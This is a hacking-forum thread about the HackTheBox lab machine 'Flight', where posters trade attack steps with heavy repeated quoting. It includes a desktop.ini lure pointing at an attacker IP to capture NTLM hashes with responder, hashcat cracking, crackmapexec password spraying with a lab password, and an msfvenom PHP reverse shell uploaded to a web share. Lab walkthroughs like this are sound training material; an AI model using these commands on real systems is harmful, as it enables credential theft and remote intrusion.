Flight - HTB [Discussion]
by - Thursday, January 1, 1970 at 12:00 AM
(November 6, 2022, 03:13 PM)loge23 Wrote:
(November 6, 2022, 02:55 PM)kujen5 Wrote:
(November 6, 2022, 02:46 PM)yumi Wrote:
(November 6, 2022, 02:05 PM)kujen5 Wrote: I have another question, how do we generate c.bum hash?
i understood the ntlm theft method and the use of responder, but it didnt generate the hash for me, can i get some help


(November 5, 2022, 09:22 PM)may123a Wrote: Tikkycoll_431012284 (c.bum)


how did u get the passwd

it as already informed here how to get the hash of c.brum:

create a desktop.ini
echo "[.ShellClassInfo]" > desktop.ini
echo IconResource=\\YOUIP\aa >> desktop.ini

upload on \\Shared

smbmap -H flight.htb -u S.MOON -p 'Password' --upload desktop.ini Shared\\desktop.ini\\

responder -I tun0 -v 

after that hashcat -m 5600 hashes.txt rockyou.txt
echo
echo IconResource=\\1.2.3.4\aa >> desktop.ini


actually i was talking also about the S.Moon user password source since i wasnt able to find it
and also i did the steps u just said and responder didnt return anything :/
(November 5, 2022, 11:22 PM)loge23 Wrote:
crackmapexec smb flight.htb -u svc_apache -p 'S@Ss!K@*t13' --users 


save users to file

crackmapexec smb flight.htb -u users.txt -p 'S@Ss!K@*t13' --continue-on-success


You are using the 'S@Ss!K@*t13' password to execute the first command, but my question is where that passwd  'S@Ss!K@*t13' came from.
Reply
(November 6, 2022, 03:21 PM)kujen5 Wrote:
(November 6, 2022, 03:13 PM)loge23 Wrote:
(November 6, 2022, 02:55 PM)kujen5 Wrote:
(November 6, 2022, 02:46 PM)yumi Wrote:
(November 6, 2022, 02:05 PM)kujen5 Wrote: I have another question, how do we generate c.bum hash?
i understood the ntlm theft method and the use of responder, but it didnt generate the hash for me, can i get some help



how did u get the passwd

it as already informed here how to get the hash of c.brum:

create a desktop.ini
echo "[.ShellClassInfo]" > desktop.ini
echo IconResource=\\YOUIP\aa >> desktop.ini

upload on \\Shared

smbmap -H flight.htb -u S.MOON -p 'Password' --upload desktop.ini Shared\\desktop.ini\\

responder -I tun0 -v 

after that hashcat -m 5600 hashes.txt rockyou.txt
echo
echo IconResource=\\1.2.3.4\aa >> desktop.ini


actually i was talking also about the S.Moon user password source since i wasnt able to find it
and also i did the steps u just said and responder didnt return anything :/
(November 5, 2022, 11:22 PM)loge23 Wrote:
crackmapexec smb flight.htb -u svc_apache -p 'S@Ss!K@*t13' --users 


save users to file

crackmapexec smb flight.htb -u users.txt -p 'S@Ss!K@*t13' --continue-on-success


You are using the 'S@Ss!K@*t13' password to execute the first command, but my question is where that passwd  'S@Ss!K@*t13' came from.


from svc_apache first step with SSRF
Reply
(November 6, 2022, 03:24 PM)yumi Wrote:
(November 6, 2022, 03:21 PM)kujen5 Wrote:
(November 6, 2022, 03:13 PM)loge23 Wrote:
(November 6, 2022, 02:55 PM)kujen5 Wrote:
(November 6, 2022, 02:46 PM)yumi Wrote: it as already informed here how to get the hash of c.brum:

create a desktop.ini
echo "[.ShellClassInfo]" > desktop.ini
echo IconResource=\\YOUIP\aa >> desktop.ini

upload on \\Shared

smbmap -H flight.htb -u S.MOON -p 'Password' --upload desktop.ini Shared\\desktop.ini\\

responder -I tun0 -v 

after that hashcat -m 5600 hashes.txt rockyou.txt
echo
echo IconResource=\\1.2.3.4\aa >> desktop.ini


actually i was talking also about the S.Moon user password source since i wasnt able to find it
and also i did the steps u just said and responder didnt return anything :/
(November 5, 2022, 11:22 PM)loge23 Wrote:
crackmapexec smb flight.htb -u svc_apache -p 'S@Ss!K@*t13' --users 


save users to file

crackmapexec smb flight.htb -u users.txt -p 'S@Ss!K@*t13' --continue-on-success


You are using the 'S@Ss!K@*t13' password to execute the first command, but my question is where that passwd  'S@Ss!K@*t13' came from.


from svc_apache first step with SSRF


and about why the responder didnt return any hash after i uploaded the desktop.ini, do you have any idea on how to fix that?
Reply
(November 6, 2022, 03:29 PM)kujen5 Wrote:
(November 6, 2022, 03:24 PM)yumi Wrote:
(November 6, 2022, 03:21 PM)kujen5 Wrote:
(November 6, 2022, 03:13 PM)loge23 Wrote:
(November 6, 2022, 02:55 PM)kujen5 Wrote: actually i was talking also about the S.Moon user password source since i wasnt able to find it
and also i did the steps u just said and responder didnt return anything :/
(November 5, 2022, 11:22 PM)loge23 Wrote:
crackmapexec smb flight.htb -u svc_apache -p 'S@Ss!K@*t13' --users 


save users to file

crackmapexec smb flight.htb -u users.txt -p 'S@Ss!K@*t13' --continue-on-success


You are using the 'S@Ss!K@*t13' password to execute the first command, but my question is where that passwd  'S@Ss!K@*t13' came from.


from svc_apache first step with SSRF


and about why the responder didnt return any hash after i uploaded the desktop.ini, do you have any idea on how to fix that?

browse the .ini file in your browser
Reply
(November 6, 2022, 03:29 PM)kujen5 Wrote:
(November 6, 2022, 03:24 PM)yumi Wrote:
(November 6, 2022, 03:21 PM)kujen5 Wrote:
(November 6, 2022, 03:13 PM)loge23 Wrote:
(November 6, 2022, 02:55 PM)kujen5 Wrote: actually i was talking also about the S.Moon user password source since i wasnt able to find it
and also i did the steps u just said and responder didnt return anything :/
(November 5, 2022, 11:22 PM)loge23 Wrote:
crackmapexec smb flight.htb -u svc_apache -p 'S@Ss!K@*t13' --users 


save users to file

crackmapexec smb flight.htb -u users.txt -p 'S@Ss!K@*t13' --continue-on-success


You are using the 'S@Ss!K@*t13' password to execute the first command, but my question is where that passwd  'S@Ss!K@*t13' came from.


from svc_apache first step with SSRF


and about why the responder didnt return any hash after i uploaded the desktop.ini, do you have any idea on how to fix that?


Try rebooting your box, wasn't working for me either for a while. After uploading the desktop.ini lure I captured the hash with 'impacket-smbserver -smb2support share .'

But responder should work just as well. No need to trigger the user, must be an automated script on the box that opens explorer or something to trigger the auth.
Reply
Anyone have idea after getting a reverse shell as svc_apache?
Reply
any hint on the ssrf for foothold?


(November 6, 2022, 03:50 PM)hacker9999 Wrote: Anyone have idea after getting a reverse shell as svc_apache?


how did you get a reverse shell
Reply
casga

try to have revshell from \\Web. I'm trying too

msfvenom -p php/reverse_php LHOST=10.10.14.X LPORT=9978 -o shell.php
upload on C.Bum \\Web and set an listener on LPORT
Browse school.url.htb/shell.php
Reply
(November 6, 2022, 04:16 PM)hacker9999 Wrote: casga

try to have revshell from \\Web. I'm trying too

msfvenom -p php/reverse_php LHOST=10.10.14.X LPORT=9978 -o shell.php
upload on C.Bum \\Web and set an listener on LPORT
Browse school.url.htb/shell.php

my problem is how they got the 'S@Ss!K@*t13' password in the first place.. i have no clue about the ssrf
and then after getting this passwd how'd they get the c.bum hash, since when uploading desktop.ini to shared on S.Moon it gives you the hash to S.Moon not c.bum
Reply
i get my php file deleted an shell crash in 1 minute.
Reply


 Users viewing this thread: Flight - HTB [Discussion]: No users currently viewing.